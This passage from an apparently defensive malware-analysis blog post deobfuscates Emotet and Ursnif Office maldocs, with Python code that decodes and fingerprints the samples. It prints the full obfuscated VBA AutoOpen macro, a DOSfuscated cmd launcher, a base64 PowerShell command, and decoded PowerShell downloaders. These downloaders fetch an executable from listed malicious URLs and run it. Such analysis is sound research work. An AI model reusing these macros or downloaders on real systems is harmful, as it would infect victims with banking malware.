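    m = re.search(r'(?i)powershell(?:\.exe)?\s+-e\w*\s+([A-Za-z0-9+/=]+)', command)
    if not m:
        raise ValueError('no -EncodedCommand argument found')
    return base64.b64decode(m.group(1)).decode('utf-16-le')


def unpack(launcher):
    """Full chain: DOSfuscated launcher -> powershell command line -> script text."""
    return [decode_encoded_command(c) for c in emulate_cmd(launcher) if 'powershell' in c.lower()]


if __name__ == '__main__':
    for step in emulate_cmd(SAMPLE_CMD):
        print(step)
    print(unpack(SAMPLE_CMD))
```

The emulator deliberately refuses anything that is not the /v:on /r launcher shape, because the substitution semantics it implements are only correct in that context; for the real sample the chain is the thirteen SET lines ending in CALL %EH%, and the same three functions walk it.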

FINALLY. OH MY GOD.

So, that's a neat little pile of powershell scripting... Let's tidy that up and see what it does?

$DrK=new-object Net.WebClient;
$KvB='http://digital.etnasoft.eu/S@http://sociomaven.com/uakJ4@http://isocialites.com.ng/3hLxUud7@http://moveisgodoi.com.br/YrE32WMD@http://nivasi.in/S'.Split('@');
$fwz = '859';
$HNp=$env:public+'\\'+$fwz+'.exe';
foreach ($Vwh in $KvB) {
  try {
    $DrK.DownloadFile($Vwh, $HNp);
    Invoke-Item $HNp;
    break;
  }
  catch{}
}

Cool, right? It creates a stub of a "web browser" in $DrK. It makes a list of urls to check in $KvB out of 5 different URLs separated by an @ symbol. Then, it goes to each of them in order and tries to download whatever is there as "859.exe" and run it with Invoke-Item.    

Fancy pants.

Needless to say, you shouldn't go clicking on those urls. They're bad for your health.

Now, let's take a look at an entirely different malware document.   

This one is 70a42e30077d2c2c80b9efc24f0c4b09d8cc51d2.

It's got a pile of VBA inside too!

	Attribute VB_Name = "hiaXrvZhVhqMVJ"
	Function XMQOOPAL()
	On Error Resume Next
	HbmZk = 88455 + hdWtV
	   HbmZk = Second(qajWG)
	   VarType CStr(446458898)
	   IsArray Sqr(91856 / zijUst * iwPkz / NiuENI)
	   IsArray 32018 * 64458 / 62173 * NRSjhr
	   VarType CStr(14)
	bajicOMD = "Md /v:^  ^ ^   /r " + CStr(Chr(AajGjwkof + zltQTRmfzifdz + 34 + ouKQwCXMlHlO + zXhZjAjkvG)) + "  S^ET  ^ "
	VarType muAZXo + ruFCu
	   IsArray CStr(pSsdww)
	   VarType Str(447804539)
	   VarType Cos(252)
	   IsArray Month(cibuv)
	tPjiC = " ^ UZnV=p^ow^`rsh`ll^ ;^` "
	HbmZk = LCase(ltajti * 80761)
	   IsArray CDate(zzwtM)
	   VarType Rnd(66923 / Wbdwn + 76957 - tOwJP)
	YOpTU = "^JAB^OAH^I^AT^AA^9A^G^4^A/^Q^B'AC^0^Ab^w^B^.A^G^"
	IsArray CDate(iGJjDM)
	   VarType CDate(255830362)
	   VarType Str(44)
	SKHLKDIj = "o^A/QB(^AH^Q^AIABO^A^G^UAdA^Au^A^FcA/^QB^.^A^E"
	VarType Rnd(4)
	   IsArray CYmVI * 42592
	   HbmZk = 93195 * VZfrn
	   HbmZk = hwHMFs / XnGkKz * wABorc * 45743
	TbbSMfH = "^M^A^bABpAG^UA^bgB^0^AD^s^A^J^A^B^BA^HAAc^QA9^"
	XMQOOPAL = bajicOMD + tPjiC + YOpTU + SKHLKDIj + TbbSMfH
	   IsArray Val(15)
	   IsArray CStr(23)
	   IsArray Log(uaJTnY)
	   VarType 98837 - GCBqT
	End Function
	Function wfhzSmJL()
	On Error Resume Next
	HbmZk = Month(85559 * CNEbcm)
	   IsArray 58939 / YQuiN + 21147 * 34620
	   HbmZk = LCase(272)
	   IsArray ziDjw - 40010
	   IsArray Int(1449 - XAWYRW)
	   IsArray Int(636)
	immusD = "ACc^A^aAB0AHQAcAA^6^AC8^ALw^B(AG8A^bgB^kA^GkA^"
	HbmZk = Rnd(jhTFCQ)
	   IsArray CDate(36829 * GICsc / cUSDW / 62313)
	   IsArray 79301 * UnfBr * 94741 - CzdGGm
	   HbmZk = TXfid + RVJZf + 29913 / Iksus
	GAkhbwazvd = "`^gB^l^AH^IA^L^g^B(^A^G8A^b^Q^A7AHQ^Ac^"
	HbmZk = 91345 / YwiHL * 21554 - oaMZzK
	   IsArray 51918 * 15079
	qwkMpZBr = "wB0AC8^Aa^QBuA^GQA/QB^4AC^4Ac^A^B"
	IsArray kzdMN - TkZJif
	   IsArray Round(KzivV)
	JjjpjaIwMj = "o^A^H^AA_^w^Bs^A^D^0AcwB7^AG^g^AbwA5^AC4Ad^A^BrA^G4"
	VarType CBool(6872)
	   VarType Tan(wTqZw)
	ProiORISwJw = "^A^JwAuA^FMAc^AB^sA^G^kAdA^A^o^ACcAQA^"
	HbmZk = Log(jujKJu)
	   HbmZk = raJfv + jrzisL
	   HbmZk = Tan(2)
	   HbmZk = zwdis - PViHW
	   HbmZk = MvBFwa + KfdqC
	NHtwKCtXr = "An^AC^kAOwA^kAH^MA[QB^uACA^A_Q^AgACcAMQ^A1^ADAAJwA^#"
	HbmZk = CCur(wSZaqq)
	   IsArray CDate(84312 + IwuTw)
	   IsArray Fix(fPrwD)
	   IsArray CByte(8005)
	VUpAswR = "AC^Q^A^SA^B^K^A^G^k^A^_^Q^A^kA^GUA"
	wfhzSmJL = immusD + GAkhbwazvd + qwkMpZBr + JjjpjaIwMj + ProiORISwJw + NHtwKCtXr + VUpAswR
	   HbmZk = 71892 * tRVnbF + iXPhv / 12786
	   IsArray 56790 + 67117 - pHczo * ahEspl
	End Function
	Function zwlScioYLa()
	On Error Resume Next
	VarType pDzSrr - lkUwbU - rAqNc - 78148
	   IsArray nEcuG + MYzWb - 1988 - DwLrd
	uqTihcErAWw = "^b^g^B^2^A^D^o^Ac^AB^1^AGIAbAB^p^AGMAKwAnAFw^AJ^w^Ar"
	VarType 84047 - qMGUNs
	   IsArray AvjQt / zlQZMX / 52924 + 1687
	   VarType Atn(124030663)
	cwRzZWiPWa = "^AC^Q^Acw^B^hA^G4AKwAnAC^4^A/^Q^B^4A^G^UA^J^wA#AG^[A^b^wB^"
	VarType 77841 * 6818 / VwnORI + 26292
	   VarType Sqr(lJTYZz * FanDWu / kzfHOL + 75938)
	UMQhmt = "5^A^G^UA^[^Q^B(AG^gA^K^A^Ak^AE^MA"
	HbmZk = 78891 - 38964 * 2778 - NjOHf
	   VarType 13039 * RmBwF / 99869 - 43558
	   HbmZk = AHFnw + aNfBAI
	   VarType LCase(59353 - YaNYL)
	jJRoiFwOWih = "bQ^BF^AC^AA^a^Q^B^uAC^A^A^JABB^A^"
	IsArray Int(krdrrJ)
	   HbmZk = Tan(jXoLa / KOcFh)
	   IsArray Cos(8948)
	JmZzLf = "H^AAc^QA^p^AHsA^dAB5AH^kA`wA^kAE^4Ac^gB^M^AC"
	IsArray Oct(WaiZBM)
	   HbmZk = LCase(86463 - IDJjap)
	   HbmZk = CVar(38175 + dKqPZ / 50388 - sLUanN)
	   VarType Atn(200)
	ANjfjo = "4^ARA^B7^A^Hc^A^bg^B^sAG^8^A[QB^kAE^[AaQ^B^s^A"
	IsArray RIjlY - PBLBjC * oiNVwj + 81280
	   VarType 80591 + 53067
	   VarType Atn(145)
	   VarType 17068 * kvnfPB / JlJav * YLirOF
	OdRHjkn = "GUA^KAA^k^AE^MA^b^QBF^ACw"
	HbmZk = 2190 + UfrXz
	   HbmZk = Hex(UAQfw / uDtRz)
	   HbmZk = Int(36415 + sPFiG)
	ErwPX = "A^IAAkAE^g^ASg^B^pACkA^O^w^B^J^AG^4^A^d^"
	IsArray CDbl(npKji)
	   VarType 99504 - 45517 / WcSBif - tFGWuE
	NtOuimzQbwZ = "g^B^7^A^GsA/^QAx^A^E^k^Ad^AB^l^A^G^0^AIA^A^kAEg^ASg"
	IsArray JaczF * 99159
	   IsArray EauvXF + wWuDd * LXJXs / 96867
	   VarType CStr(80)
	   HbmZk = Str(imUiZ - XZZWAz)
	aMlTvB = "^Bp^A^D^s^A^[^gB5^AG^UA[^Q^B"
	IsArray 9953 - whBAzi
	   IsArray 51646 * OEohH - 56216 / cWoaQw
	   IsArray Sin(352577857)
	iPNpVC = "rAD^sAf^Q^B(^A^GEAd^AB("
	zwlScioYLa = uqTihcErAWw + cwRzZWiPWa + UMQhmt + jJRoiFwOWih + JmZzLf + ANjfjo + OdRHjkn + ErwPX + NtOuimzQbwZ + aMlTvB + iPNpVC
	   VarType CDec(zXCfv)
	   IsArray 37837 / KwaUz
	   VarType Sqr(9236)
	   HbmZk = Int(DRiSlr - XEiHR)
	End Function
	Function MjcuzKHUwfK()
	On Error Resume Next
	HbmZk = 67864 * Cbllju
	   IsArray CStr(lVIzjS)
	BhsQm = "^A^GgA^`^w^B^9AH^0^A^I^AA^"
	IsArray Val(31)
	   VarType CDbl(MjiflF)
	FnXhj = "g^AC^A^A^IA^A^g^ACAAIAA^gAC^A^AIA^Ag^ACA^A^I^"
	VarType Str(QaBEqb)
	bNcmtmfOQEQ = "A^AgAC^A^AIA^A^gAA^==&& S^E^T "
	HbmZk = OszJGw + 62992 * 30763 / SqmWlG
	   IsArray 6074 * jwVWpo
	   VarType CGWpf + DTvGkQ / 35374 + YtOHR
	   HbmZk = oujTYA - DiPwp * 21069 * wzQwSs
	qjXiOjzFQU = "^pu=!U^ZnV:^5=^y^!&    s^et  ^ "
	VarType CByte(301894302)
	   VarType TcWXTI * OiARpk + 97096 + XrKYCv
	GZcaphhi = "^ ^uop^S=^!^pu:^_=^P^!&&    SE^"
	HbmZk = LCase(83959 + WGtWw - KFAAwd / kachLJ)
	   IsArray TypeName(12856 / RwuAz + 10564 * kFMfVz)
	KOBdA = "T ^ ^   ^S^i=^!^u^o^p^S:^"
	HbmZk = Str(hOHkjz / tNawa)
	   VarType CDbl(vpESPu - wJmYip)
	   IsArray Val(FRvHo)
	   IsArray Round(90862 - WfUwA)
	   HbmZk = Round(HMWDH - 27337 - 48303 * 80671)
	nOzrKBQkA = "[^=^Y!&    se^T K^q^f=^!^S^i^:/=^Z^!&&  "
	MjcuzKHUwfK = BhsQm + FnXhj + bNcmtmfOQEQ + qjXiOjzFQU + GZcaphhi + KOBdA + nOzrKBQkA
	   HbmZk = Round(mZCRU)
	End Function
	Function zHfRQZpo()
	On Error Resume Next
	IsArray CDate(EnarXY / 19809)
	   IsArray Log(UzcISz)
	   HbmZk = Second(45)
	IozVTzfTE = "  S^E^T ^l4^9=^!^K^q^f:^7=v!&se^T ^ ^l"
	HbmZk = TimeValue(ckkwKl)
	   IsArray Sqr(VziwQz)
	   IsArray 82844 + 41596 / 32478 / LRdFj
	oIJhRZZz = "Q=^!^l^4^9^:;=^-^!&& S^Et  ^  ^ ^0^mc=^!^lQ:^'^="
	HbmZk = Str(niGEKb)
	   VarType CStr(7574)
	   IsArray TimeValue(KTrPFz + ojTQDV * 44552 + kQktN)
	YWtwc = "3^!&    S^Et  ^ ^e^bv=^!^0^mc"
	HbmZk = Sgn(RnnMOM)
	   VarType CByte(PrRPCw)
	   IsArray 69539 * 11332
	mwFFI = "^:(^=j^!&  s^e^t ^  ^ R^W^P^z=^!^e^bv:^x=^"
	IsArray Second(zpcPFW + ahwKqj - zSJUZ * Zjzhc)
	   VarType 98208 / rQXkE + cKXHsY / CHcDj
	   VarType Month(9)
	   HbmZk = zsbiO * Rsumw + 56411 - FqhnGi
	QFjROAJcH = "t!& SE^t  ^ ^  ^0y^Ye=!R^W^P^z:#^=7^!& sE^T  ^ ^J^o"
	IsArray CStr(7)
	EBoAwjb = "C=^!^0^y^Y^e^:^.=i^!&   "
	HbmZk = TypeName(514)
	   VarType CStr(100750616)
	   VarType CByte(130064755)
	   IsArray CStr(dpEZc)
	CfsfV = " S^Et ^ ^ ^  ^qh=^!^J^oC:`^=e^!&&cA^L^l  %^qh%" + CStr(Chr(YijUzjwwHpiOVk + IJhCEIBGwD + 34 + FEzDiwip + KCSkQItTE)) + "  "
	zHfRQZpo = IozVTzfTE + oIJhRZZz + YWtwc + mwFFI + QFjROAJcH + EBoAwjb + CfsfV
	   VarType wooVw / 38997 / 69792 * kLPjP
	   IsArray Hex(pzBMwq)
	End Function
	
	Attribute VB_Name = "zFLiEKVma"
	
	Sub AutoOpen()
	On Error Resume Next
	Shell% KeyString(FRlcUFjYY + JmFqhtGk + 67 + YOzfFmBN + SPjjqzqP) + cPhoBmLaqFzV + hDlwOSiL + XMQOOPAL + wfhzSmJL + zwlScioYLa + 	MjcuzKHUwfK + zHfRQZpo + rtCYAiDroJ + hLdTbbXk, 205377560 - 205377560
	End Sub

Hmm. Okay, this looks familiar. The AutoOpen() block is a tiny bit different, using Shell% instead, but it's pretty close to the same thing at the end of the day. Let's see what that string evaluates to.

CMd /v:^ ^ ^ /r " S^ET ^ ^ UZnV=p^ow^`rsh`ll^ ;^` ^JAB^OAH^I^AT^AA^9A^G^4^A/^Q^B'AC^0^Ab^w^B^.A^G^o^A/QB(^AH^Q^AIABO^A^G^UAdA^Au^A^FcA/^QB^.^A^E^M^
A^bABpAG^UA^bgB^0^AD^s^A^J^A^B^BA^HAAc^QA9^ACc^A^aAB0AHQAcAA^6^AC8^ALw^B(AG8A^bgB^kA^GkA^`^gB^l^A
H^IA^L^g^B(^A^G8A^b^Q^A7AHQ^Ac^wB0AC8^Aa^QBuA^GQA/QB^4AC^4Ac^A^Bo^A^H^AA_^w^Bs^A^D^0AcwB7^AG^g^Ab
wA5^AC4Ad^A^BrA^G4^A^JwAuA^FMAc^AB^sA^G^kAdA^A^o^ACcAQA^An^AC^kAOwA^kAH^MA[QB^uACA^A_Q^AgACcAMQ^A
1^ADAAJwA^#AC^Q^A^SA^B^K^A^G^k^A^_^Q^A^kA^GUA^b^g^B^2^A^D^o^Ac^AB^1^AGIAbAB^p^AGMAKwAnAFw^AJ^w^Ar
^AC^Q^Acw^B^hA^G4AKwAnAC^4^A/^Q^B^4A^G^UA^J^wA#AG^[A^b^wB^5^A^G^UA^[^Q^B(AG^gA^K^A^Ak^AE^MAbQ^BF^
AC^AA^a^Q^B^uAC^A^A^JABB^A^H^AAc^QA^p^AHsA^dAB5AH^kA`wA^kAE^4Ac^gB^M^AC4^ARA^B7^A^Hc^A^bg^B^sAG^8
^A[QB^kAE^[AaQ^B^s^AGUA^KAA^k^AE^MA^b^QBF^ACwA^IAAkAE^g^ASg^B^pACkA^O^w^B^J^AG^4^A^d^g^B^7^A^GsA/
^QAx^A^E^k^Ad^AB^l^A^G^0^AIA^A^kAEg^ASg^Bp^A^D^s^A^[^gB5^AG^UA[^Q^BrAD^sAf^Q^B(^A^GEAd^AB(^A^GgA^
`^w^B^9AH^0^A^I^AA^g^AC^A^A^IA^A^g^ACAAIAA^gAC^A^AIA^Ag^ACA^A^I^A^AgAC^A^AIA^A^gAA^==&& S^E^T ^pu
=!U^ZnV:^5=^y^!& s^et ^ ^ ^uop^S=^!^pu:^_=^P^!&& SE^T ^ ^ ^S^i=^!^u^o^p^S:^[^=^Y!& se^T K^q^f=^!^S^i^:/=^Z^!&& S^E^T ^l4^9=^!^K^q^f:^7=v!&se^T ^ ^lQ=^!^l^4^9^:;=^-^!&& S^Et ^ ^ ^0^mc=^!^lQ:^'^=3^!& S^Et ^ ^e^bv=^!^0^mc^:(^=j^!& s^e^t ^ ^ R^W^P^z=^!^e^bv:^x=^t!& SE^t ^ ^ ^0y^Ye=!R^W^P^z:#^=7^!& sE^T ^ ^J^oC=^!^0^y^Y^e^:^.=i^!& S^Et ^ ^ ^ ^qh=^!^J^oC:`^=e^!&&cA^L^l %^qh%

Again with the DOSfuscation! That stuff unpacks to running:

powershell -e JABOAHIATAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABBAHAAcQA9ACcAa
AB0AHQAcAA6AC8ALwBjAG8AbgBkAGkAegBlAHIALgBjAG8AbQAvAHQAcwB0AC8AaQBuAGQAZQB4AC4AcABoAHAAPwBsAD0Acw
BvAGgAbwAyAC4AdABrAG4AJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAHMAYQBuACAAPQAgACcAMQA1ADAAJwA7ACQASAB
KAGkAPQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAcwBhAG4AKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBj
AGgAKAAkAEMAbQBFACAAaQBuACAAJABBAHAAcQApAHsAdAByAHkAewAkAE4AcgBMAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsA
GUAKAAkAEMAbQBFACwAIAAkAEgASgBpACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEgASgBpADsAYgByAGUAYQBrAD
sAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==

Which is...

"$\x00N\x00r\x00L\x00=\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00N\x00e\x00t\x00.\x00W\x00e\x00b\x00C\x00l\x00i\x00e\x00n\x00t\x00;\x00$\x00A\x00p\x00q\x00=\x
00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00o\x00n\x00d\x00i\x00z\x00e\x00r\x00.\x00c\x00o\x00
m\x00/\x00t\x00s\x00t\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00p\x00h\x00p\x00?\x00l\x00=\x00s\x00o\
x00h\x00o\x002\x00.\x00t\x00k\x00n\x00'\x00.\x00S\x00p\x00l\x00i\x00t\x00(\x00'\x00@\x00'\x00)\x0
0;\x00$\x00s\x00a\x00n\x00 \x00=\x00 \x00'\x001\x005\x000\x00'\x00;\x00$\x00H\x00J\x00i\x00=\x00$\x00e\x00n\x00v\x00:\x00p\x00u\x00b\x
00l\x00i\x00c\x00+\x00'\x00\\\x00'\x00+\x00$\x00s\x00a\x00n\x00+\x00'\x00.\x00e\x00x\x00e\x00'\x0
0;\x00f\x00o\x00r\x00e\x00a\x00c\x00h\x00(\x00$\x00C\x00m\x00E\x00 \x00i\x00n\x00 \x00$\x00A\x00p\x00q\x00)\x00{\x00t\x00r\x00y\x00{\x00$\x00N\x00r\x00L\x00.\x00D\x00o\x00w\x00n\x
00l\x00o\x00a\x00d\x00F\x00i\x00l\x00e\x00(\x00$\x00C\x00m\x00E\x00,\x00 \x00$\x00H\x00J\x00i\x00)\x00;\x00I\x00n\x00v\x00o\x00k\x00e\x00-\x00I\x00t\x00e\x00m\x00 \x00$\x00H\x00J\x00i\x00;\x00b\x00r\x00e\x00a\x00k\x00;\x00}\x00c\x00a\x00t\x00c\x00h\x00{\x00}\x
00}\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00"

Ugh, UTF-16LE again...

"$NrL=new-object Net.WebClient;$Apq='http://condizer.com/tst/index.php?l=soho2.tkn'.Split('@');$san = 
'150';$HJi=$env:public+'\\'+$san+'.exe';foreach($CmE in $Apq){try{$NrL.DownloadFile($CmE,
 $HJi);Invoke-Item $HJi;break;}catch{}}                 "

Well. Look at that. The same script we saw earlier, more or less.

$NrL=new-object Net.WebClient;
$Apq='http://condizer.com/tst/index.php?l=soho2.tkn'.Split('@');
$san = '150';
$HJi=$env:public+'\\'+$san+'.exe';
foreach ($CmE in $Apq) {
  try {
    $NrL.DownloadFile($CmE, $HJi);
    Invoke-Item $HJi;
    break;
  }
  catch{}
}

It's taking a list of URLs in $Apq and downloading them as "150.exe" and running them...

Wait.

There's only one url in the url list, but it's splitting the URL list on "@"?   

Why would you do that?

Clearly someone here has used the same tool as before to push a malware download URL, but what's on the other end of this URL?

It turns out this is an Ursnif sample. Which is weird and cool, because it's being delivered in something that might as well be an Emotet maldoc.  
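The "same tool as before" observation can be made mechanical. The two decoded downloaders differ only in variable names and payload, so one regex with back-references matches the generator's template and pulls out the URL list and the drop file, and a one-element list that still goes through .Split('@') falls out as a flag. This is an added example, not code from the post; the two scripts it parses are the post's own decoded output (the post prints the path separator escaped as \\), and nothing here contacts any of those URLs.

```python
import re

# The two de-obfuscated downloaders as shown above; the URLs are the post's own
# indicators and are only parsed, never fetched.
EMOTET_DOWNLOADER = (
    "$DrK=new-object Net.WebClient;"
    "$KvB='http://digital.etnasoft.eu/S@http://sociomaven.com/uakJ4@http://isocialites.com.ng/3hLxUud7"
    "@http://moveisgodoi.com.br/YrE32WMD@http://nivasi.in/S'.Split('@');"
    "$fwz = '859';$HNp=$env:public+'\\'+$fwz+'.exe';"
    "foreach($Vwh in $KvB){try{$DrK.DownloadFile($Vwh, $HNp);Invoke-Item $HNp;break;}catch{}}"
)
URSNIF_DOWNLOADER = (
    "$NrL=new-object Net.WebClient;"
    "$Apq='http://condizer.com/tst/index.php?l=soho2.tkn'.Split('@');"
    "$san = '150';$HJi=$env:public+'\\'+$san+'.exe';"
    "foreach($CmE in $Apq){try{$NrL.DownloadFile($CmE, $HJi);Invoke-Item $HJi;break;}catch{}}"
)

# One regex for the whole generator template. Back-references tie the variable names
# together, so a match means the script has exactly this shape whatever the names are.
TEMPLATE = re.compile(
    r"\$(?P<client>\w+)=new-object Net\.WebClient;"
    r"\$(?P<urls>\w+)='(?P<urllist>[^']*)'\.Split\('@'\);"
    r"\$(?P<stem>\w+) = '(?P<stemval>[^']*)';"
    r"\$(?P<path>\w+)=\$env:public\+'\\\\?'\+\$(?P=stem)\+'\.exe';"
    r"foreach\(\$(?P<item>\w+) in \$(?P=urls)\)\{try\{"
    r"\$(?P=client)\.DownloadFile\(\$(?P=item),\s*\$(?P=path)\);"
    r"Invoke-Item \$(?P=path);break;\}catch\{\}\}"
)


def fingerprint(script):
    """Extract the template's payload fields, or None if the script is not this template."""
    m = TEMPLATE.search(script)
    if not m:
        return None
    urls = m.group('urllist').split('@')
    return {
        'urls': urls,
        'url_count': len(urls),
        'drop_path': '%PUBLIC%\\' + m.group('stemval') + '.exe',
        # The generator always emits .Split('@'), however many URLs it was given;
        # a single URL still wrapped in the split is the tell discussed above.
        'single_url_split': len(urls) == 1,
        'names': tuple(m.group(g) for g in ('client', 'urls', 'stem', 'path', 'item')),
    }


def same_generator(a, b):
    """True when both scripts match the template, i.e. differ only in names and payload."""
    return fingerprint(a) is not None and fingerprint(b) is not None


def defang(url):
    """Render an indicator so it cannot be clicked or auto-linked in a report."""
    return url.replace('http', 'hxxp').replace('.', '[.]')


if __name__ == '__main__':
    for label, script in (('Emotet', EMOTET_DOWNLOADER), ('Ursnif', URSNIF_DOWNLOADER)):
        fp = fingerprint(script)
        print(label, fp['drop_path'], fp['url_count'], fp['single_url_split'])
        for u in fp['urls']:
            print('   ', defang(u))
    print('same generator:', same_generator(EMOTET_DOWNLOADER, URSNIF_DOWNLOADER))
```

The regex is brittle on purpose: it encodes the generator's exact output, so a script that stops matching is itself a signal that the tool changed hands or versions, which is the sort of thing worth tracking across samples.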

I wonder how that happened. No, really, I wonder how that happened. You see, we’ve observed a few things with Emotet.  

We know that they mostly drop their own banking malware from their URL quintets, but occasionally they will load up their own spam tools to send their maldocs out, and sometimes they will even distribute PandaBanker or the TrickBot trojan instead.    

We’ve seen prior “versions” of Emotet manifesting as two parallel sets of distribution infrastructure, originally distributing different malware. This has recently morphed into a single infrastructure that generally distributes only one kind of thing at a time; although it has been occasionally observed to distribute different download URLs in parallel during the same time window, suggesting a capability to run multiple campaigns contemporaneously.

Clearly, this Ursnif sample isn’t being served from the Emotet group’s distribution infrastructure, but it’s very interesting nonetheless. Did a third party write the tool that creates the maldoc from a template and contains the payload URLs and both of these groups obtained it? Did the Emotet group write that tool for their own purposes, and then they sold it to the Ursnif group (or the Ursnif group obtained it through some means)? Was this a test run for a campaign by the Emotet group to embed a link to the Ursnif group’s payload infrastructure in their own spam email delivery?

We can’t really know, but it’s something to watch for.


